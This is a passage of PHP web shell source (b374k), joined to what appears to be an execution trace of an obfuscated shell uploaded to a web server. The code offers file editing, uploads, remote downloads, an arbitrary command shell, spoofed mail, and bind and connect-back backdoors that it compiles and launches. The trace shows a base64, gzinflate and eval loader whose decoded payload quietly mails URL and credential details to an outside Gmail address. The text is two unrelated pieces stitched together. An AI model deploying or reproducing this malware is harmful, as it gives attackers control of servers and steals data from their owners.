@array_push($dbs, $db);
}
@sort($dbs);
foreach ($dbs as $db) {
$msg .= "<tr><td><a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $db . "\">{$db}</a></td></tr>";
}
$msg .= "</table>";
}
@mysql_close($con);
} else {
$msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
}
echo $msg;
} else {
?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php
echo $pwd;
?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php
}
} elseif (isset($_GET['x']) && $_GET['x'] == 'mail') {
if (isset($_POST['mail_send'])) {
$mail_to = $_POST['mail_to'];
$mail_from = $_POST['mail_from'];
$mail_subject = $_POST['mail_subject'];
$mail_content = magicboom($_POST['mail_content']);
if (@mail($mail_to, $mail_subject, $mail_content, "FROM:{$mail_from}")) {
$msg = "email sent to {$mail_to}";
} else {
$msg = "send email failed";
}
}
?> <form action="?y=<?php
echo $pwd;
?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php
echo $msg;
?></td></tr> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'phpinfo') {
@ob_start();
@phpinfo();
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff, "<body>") + 6;
$akhir = strpos($buff, "</body>");
echo "<div class=\"phpinfo\">" . substr($buff, $awal, $akhir - $awal) . "</div>";
} elseif (isset($_GET['view']) && $_GET['view'] != "") {
if (is_file($_GET['view'])) {
if (!isset($file)) {
$file = magicboom($_GET['view']);
}
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($file));
$group = @posix_getgrgid(@filegroup($file));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$filn = basename($file);
echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"" . clearspace($filn) . "_link\">" . $file . "</span> <form action=\"?y=" . $pwd . "&view={$file}\" method=\"post\" id=\"" . clearspace($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\" /> </form> </td></tr> <tr><td>Size</td><td>" . ukuran($file) . "</td></tr> <tr><td>Permission</td><td>" . get_perms($file) . "</td></tr> <tr><td>Owner</td><td>" . $owner . "</td></tr> <tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr> <tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr> <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr> <tr><td>Actions</td><td><a href=\"?y={$pwd}&edit={$file}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\">rename</a> | <a href=\"?y={$pwd}&delete={$file}\">delete</a> | <a href=\"?y={$pwd}&dl={$file}\">download</a> (<a href=\"?y={$pwd}&dlgzip={$file}\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=" . $pwd . "&view=" . $file . "\">text</a> | <a href=\"?y=" . $pwd . "&view=" . $file . "&type=code\">code</a> | <a href=\"?y=" . $pwd . "&view=" . $file . "&type=image\">image</a></td></tr> </table> ";
if (isset($_GET['type']) && $_GET['type'] == 'image') {
echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=" . $pwd . "&img=" . $filn . "\"></div>";
} elseif (isset($_GET['type']) && $_GET['type'] == 'code') {
echo "<div class=\"viewfile\">";
$file = wordwrap(@file_get_contents($file), "240", "\n");
@highlight_string($file);
echo "</div>";
} else {
echo "<div class=\"viewfile\">";
echo nl2br(htmlentities(@file_get_contents($file)));
echo "</div>";
}
} elseif (is_dir($_GET['view'])) {
echo showdir($pwd, $prompt);
}
} elseif (isset($_GET['edit']) && $_GET['edit'] != "") {
if (isset($_POST['save'])) {
$file = $_POST['saveas'];
$content = magicboom($_POST['content']);
if ($filez = @fopen($file, "w")) {
$time = date("d-M-Y H:i", time());
if (@fwrite($filez, $content)) {
$msg = "file saved <span class=\"gaya\">@</span> " . $time;
} else {
$msg = "failed to save";
}
@fclose($filez);
} else {
$msg = "permission denied";
}
}
if (!isset($file)) {
$file = $_GET['edit'];
}
if ($filez = @fopen($file, "r")) {
$content = "";
while (!feof($filez)) {
$content .= htmlentities(str_replace("''", "'", fgets($filez)));
}
@fclose($filez);
}
?> <form action="?y=<?php
echo $pwd;
?>&edit=<?php
echo $file;
?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php
echo $content;
?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php
echo $file;
?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php
echo $msg;
?></td></tr> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'upload') {
if (isset($_POST['uploadcomp'])) {
if (is_uploaded_file($_FILES['file']['tmp_name'])) {
$path = magicboom($_POST['path']);
$fname = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];
$pindah = $path . $fname;
$stat = @move_uploaded_file($tmp_name, $pindah);
if ($stat) {
$msg = "file uploaded to {$pindah}";
} else {
$msg = "failed to upload {$fname}";
}
} else {
$msg = "failed to upload {$fname}";
}
} elseif (isset($_POST['uploadurl'])) {
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$path = magicboom($_POST['path']);
$namafile = download($pilihan, $wurl);
$pindah = $path . $namafile;
if (is_file($pindah)) {
$msg = "file uploaded to {$pindah}";
} else {
$msg = "failed to upload {$namafile}";
}
}
?> <form action="?y=<?php
echo $pwd;
?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php
echo $pwd;
?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php
echo $pwd;
?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php
echo $pwd;
?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php
echo $msg;
?></div> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'netsploit') {
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'C') {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdc.c", $port_bind_bd_c);
exe("gcc -o bdc bdc.c");
exe("chmod 777 bdc");
@unlink("bdc.c");
exe("./bdc " . $port . " " . $passwrd . " &");
$scan = exe("ps aux");
if (eregi("./bdc {$por}", $scan)) {
$msg = "<p>Process found running, backdoor setup successfully.</p>";
} else {
$msg = "<p>Process not found running, backdoor not setup successfully.</p>";
}
} elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'Perl') {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdp", $port_bind_bd_pl);
exe("chmod 777 bdp");
$p2 = which("perl");
exe($p2 . " bdp " . $port . " &");
$scan = exe("ps aux");
if (eregi("{$p2} bdp {$port}", $scan)) {
$msg = "<p>Process found running, backdoor setup successfully.</p>";
} else {
$msg = "<p>Process not found running, backdoor not setup successfully.</p>";
}
} elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'C') {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcc.c", $back_connect_c);
exe("gcc -o bcc bcc.c");
exe("chmod 777 bcc");
@unlink("bcc.c");
exe("./bcc " . $ip . " " . $port . " &");
$msg = "Now script try connect to " . $ip . " port " . $port . " ...";
} elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'Perl') {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcp", $back_connect);
exe("chmod +x bcp");
$p2 = which("perl");
exe($p2 . " bcp " . $ip . " " . $port . " &");
$msg = "Now script try connect to " . $ip . " port " . $port . " ...";
} elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$namafile = download($pilihan, $wurl);
if (is_file($namafile)) {
$msg = exe($wcmd);
} else {
$msg = "error: file not found {$namafile}";
}
}
?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php
echo $bindport;
?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php
echo $bindport_pass;
?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php
echo getenv('REMOTE_ADDR') ? getenv('REMOTE_ADDR') : "127.0.0.1";
?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php
echo $bindport;
?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php
echo $msg;
?></div> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'shell') {
?> <form action="?y=<?php
echo $pwd;
?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php
if (isset($_POST['submitcmd'])) {
echo @exe($_POST['cmd']);
}
?> </textarea> <tr><td colspan="2"><?php
echo $prompt;
?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php
} else {
if (isset($_GET['delete']) && $_GET['delete'] != "") {
$file = $_GET['delete'];
@unlink($file);
} elseif (isset($_GET['fdelete']) && $_GET['fdelete'] != "") {
@rmdir(rtrim($_GET['fdelete'], DIRECTORY_SEPARATOR));
} elseif (isset($_GET['mkdir']) && $_GET['mkdir'] != "") {
$path = $pwd . $_GET['mkdir'];
@mkdir($path);
}
$buff = showdir($pwd, $prompt);
echo $buff;
}
?> </div> </body> </html> <?php
};Execution traces
data/traces/740f1358b52dede7d6e9a37a6e82d4e3_trace-1676242950.2457.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:02:56.143564]
1 0 1 0.000129 393464
1 3 0 0.000266 410912 {main} 1 /var/www/html/uploads/xc.php 0 0
2 4 0 0.000283 410912 error_reporting 0 /var/www/html/uploads/xc.php 3 1 0
2 4 1 0.000329 410952
2 4 R 0
2 5 0 0.000343 410912 set_time_limit 0 /var/www/html/uploads/xc.php 4 1 0
2 5 1 0.000359 410976
2 5 R FALSE
1 A /var/www/html/uploads/xc.php 7 $code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2 6 0 0.000411 410944 base64_decode 0 /var/www/html/uploads/xc.php 194 1 '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2 6 1 0.000481 427360
2 6 R '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 0 0.000716 427328 gzinflate 0 /var/www/html/uploads/xc.php 194 1 '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 1 0.001060 468320
2 7 R '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
2 8 0 0.002246 692624 eval 1 '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "username: ".$user."\\n";$mes .= "password: ".$pass."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$full\\">delete</a> | <a href=\\"?y=$pwd&dl=$full\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } 